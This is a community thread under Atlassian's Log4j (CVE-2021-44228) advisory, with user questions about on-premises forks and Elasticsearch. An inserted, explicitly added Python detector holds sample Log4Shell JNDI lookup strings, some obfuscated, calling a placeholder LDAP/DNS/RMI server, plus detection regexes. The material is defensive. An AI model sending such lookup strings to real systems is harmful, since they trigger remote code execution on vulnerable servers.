Atlassian's Response to Log4j (CVE-2021-44228)

On December 9, Atlassian became aware of the vulnerability CVE-2021-44228 - Log4j.

Impact on Cloud Products

This vulnerability has been mitigated for all Atlassian cloud products previously using vulnerable versions of Log4j. To date, our analysis has not identified compromise of Atlassian systems or customer data prior to the patching of these systems. Atlassian customers are not vulnerable, and no action is required.

Impact on On-Premises Products

No Atlassian on-premises products are vulnerable to CVE-2021-44228.

Some on-premises products use an Atlassian-maintained fork of Log4j 1.2.17, which is not vulnerable to CVE-2021-44228. We have done additional analysis on this fork and confirmed a new but similar vulnerability that can only be exploited by a trusted party. For that reason, Atlassian rates the severity level for on-premises products as low.

For further detailed information, please visit:

https://confluence.atlassian.com/display/SECURITY/Multiple+Products+Security+Advisory+-+Log4j+Vulnerable+To+Remote+Code+Execution+-+CVE-2021-44228

https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html

16 comments

Dave Liao Community Leader Dec 13, 2021

Thank you for sharing this!


What about the Elasticsearch recommended by Atlassian for Bitbucket Data Center (Elasticsearch 6.8.6)?


@license management, we will have an update soon on this.

Hi @Jodie Vlassis 

Our on-prem instance contains this JAR: 
log4j2-stacktrace-origins-2.2-atlassian-2.jar

This other thread has some findings/questions from other community users as well.
https://community.atlassian.com/t5/Jira-Core-Server-questions/Is-log4j2-stacktrace-origins-2-2-atlassian-2-jar-vulnerable-to/qaq-p/1884806

Based on their findings, this log4j2-stacktrace-origins-2.2-atlassian-2.jar appears to be a fork of log4j2. Is it therefore vulnerable?

Please confirm, thanks!

Ollie Guan Community Leader Dec 14, 2021

Hi @Jodie Vlassis ,

Thank you for your notice. However, not all users follow the posts in the community in real time.

As a user, is there any way to subscribe to these latest notifications from Atlassian Support's Security?

Hi @Ollie Guan 

You can track all things products and incidents via Atlassian Statuspage - https://status.atlassian.com/

Ollie Guan Community Leader Dec 14, 2021

Hi @Jodie Vlassis ,

Thanks for your quick response ^_^. These seem to be services for the cloud. Is there an entrance for Data Center?

"We have done additional analysis on this fork and confirmed a new but similar vulnerability that can only be exploited by a trusted party". 

Is it possible to have more information about this vulnerability? In this case, what is a trusted party?

thanks


@julien roynette 

There are indeed 3 vectors: the LDAP query that you can currently spot everywhere in the wild. The two others seem to be DNS and RMI. More info here:

https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

and 

https://www.picussecurity.com/resource/blog/simulating-and-preventing-cve-2021-44228-apache-log4j-rce-exploits

As for Elasticsearch 6.8.6, I can confirm it is vulnerable to the attack, but it can be mitigated by simply adding a "-Dlog4j2.formatMsgNoLookups=true" flag to its Java env until a better solution is provided.

Kind regards

Jonas Andersson

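Detection and mitigation check for the three lookup vectors named in the comment above (LDAP, DNS, RMI), as an added example that is not part of the original thread and not Atlassian's or Elastic's code. It scans constructed access-log lines for `${jndi:...}` lookups, folding the nested `${lower:x}` / `${::-x}` / `${env:X:-x}` obfuscations seen in the wild before matching, and checks whether a jvm.options-style text carries the `-Dlog4j2.formatMsgNoLookups=true` flag from the comment. The sample log lines, the IP addresses and the jvm.options prefix handling are assumptions. One caveat a practitioner should keep in mind: that property exists only in Log4j 2.10 and later, and it does not switch off the non-message lookups later tracked as CVE-2021-45046, so it is a stopgap and upgrading Log4j remains the fix.

```python
import re

# Final pattern after de-obfuscation: ${jndi:ldap://...}, ${jndi:dns://...},
# ${jndi:rmi://...}. Only the three schemes from the comment are checked.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|dns|rmi)\s*:", re.IGNORECASE)

# Nested single-character lookups used to hide the word "jndi" from naive
# string matching: ${lower:j}, ${upper:N}, ${::-d}, ${env:NO_SUCH_VAR:-i}.
# The class [^${}] keeps the default-value form from swallowing an enclosing
# "${", so "${${::-j}ndi:..." keeps its outer delimiter after folding.
NESTED_RE = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([a-z])\s*\}"   # ${lower:j}
    r"|\$\{\s*[^${}]*:-\s*([a-z])\s*\}",           # ${::-j}, ${env:X:-j}
    re.IGNORECASE,
)


def deobfuscate(msg: str) -> str:
    """Collapse nested one-character lookups until nothing changes.

    Payloads nest several layers deep, so loop to a fixed point. Only the
    single-character forms are folded; anything else is left untouched.
    """
    prev = None
    while prev != msg:
        prev = msg
        msg = NESTED_RE.sub(lambda m: m.group(1) or m.group(2), msg)
    return msg


def find_jndi_lookups(lines):
    """Return (line_no, scheme, deobfuscated_line) for each line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        clean = deobfuscate(line)
        m = JNDI_RE.search(clean)
        if m:
            hits.append((n, m.group(1).lower(), clean))
    return hits


def lookups_disabled(jvm_options_text: str) -> bool:
    """True if the JVM options carry -Dlog4j2.formatMsgNoLookups=true.

    Accepts either an ES_JAVA_OPTS-style one-liner or the body of an
    Elasticsearch jvm.options file (one option per line, '#' comments,
    optional "8-13:" JDK-version prefix). The prefix handling is an
    assumption about that file format, not Elastic's own parser.
    The property only exists in Log4j 2.10+ and does not cover the
    non-message lookups tracked as CVE-2021-45046: treat it as a stopgap.
    """
    opts = []
    for raw in jvm_options_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^\d+(-\d*)?:", line):
            line = line.split(":", 1)[1]
        opts.extend(line.split())
    return "-Dlog4j2.formatMsgNoLookups=true" in opts


# Constructed sample access-log lines (not real traffic). Lines 1 and 5 are
# benign; lines 2-4 carry one vector each, the last two obfuscated.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:21:07 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:21:09 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:21:11 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:d}ns://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:10:21:13 +0000] "GET /api HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/o}" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:10:22:00 +0000] "GET /docs/${version} HTTP/1.1" 404 "-" "Mozilla/5.0"',
]

# Constructed jvm.options fragment with the stopgap applied.
SAMPLE_JVM_OPTIONS = """\
-Xms1g
-Xmx1g
8-13:-XX:+UseConcMarkSweepGC
# Log4Shell stopgap until Log4j is upgraded
-Dlog4j2.formatMsgNoLookups=true
"""

if __name__ == "__main__":
    for n, scheme, clean in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: {scheme} lookup -> {clean}")
    print("formatMsgNoLookups set:", lookups_disabled(SAMPLE_JVM_OPTIONS))
```

The matcher is not tied to access logs: any text field that ends up in a log message (User-Agent, form fields, or the email bodies reported further down this thread) can be run through `find_jndi_lookups` the same way. Matching after de-obfuscation is the point; grepping for the literal string `jndi` misses the nested forms that were already common in the first days after disclosure.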

Hi, does this also cover Trello?

@Jodie Vlassis the updated advisory does not explicitly state whether log4j2-stacktrace-origins-2.2-atlassian-2.jar is covered by the vulnerability or not. Can we please get an explicit statement for this module?


If the cloud products are not vulnerable, how do they explain these JNDI LDAP emails that someone sent from our JIRA cloud admin page to our entire company?

The email headers say they originated from Atlassian themselves (DMARC pass, SPF pass, etc.), apparently from our hosted company Jira portal instance. I reported this in a ticket nearly a day ago and they didn't respond.

[attached screenshot: hacktheworld.png]

My organization is mandating a minimum version of Log4j, currently 2.17.1. Even if the Log4j vulnerability is handled in the Atlassian-forked 1.2.17 version, it is still 1.2.17; the official 1.2.17 is very old and out of support and has other concerns, so this continues to be identified as a problem. Are there any plans to update versioning for this Atlassian-forked variant?

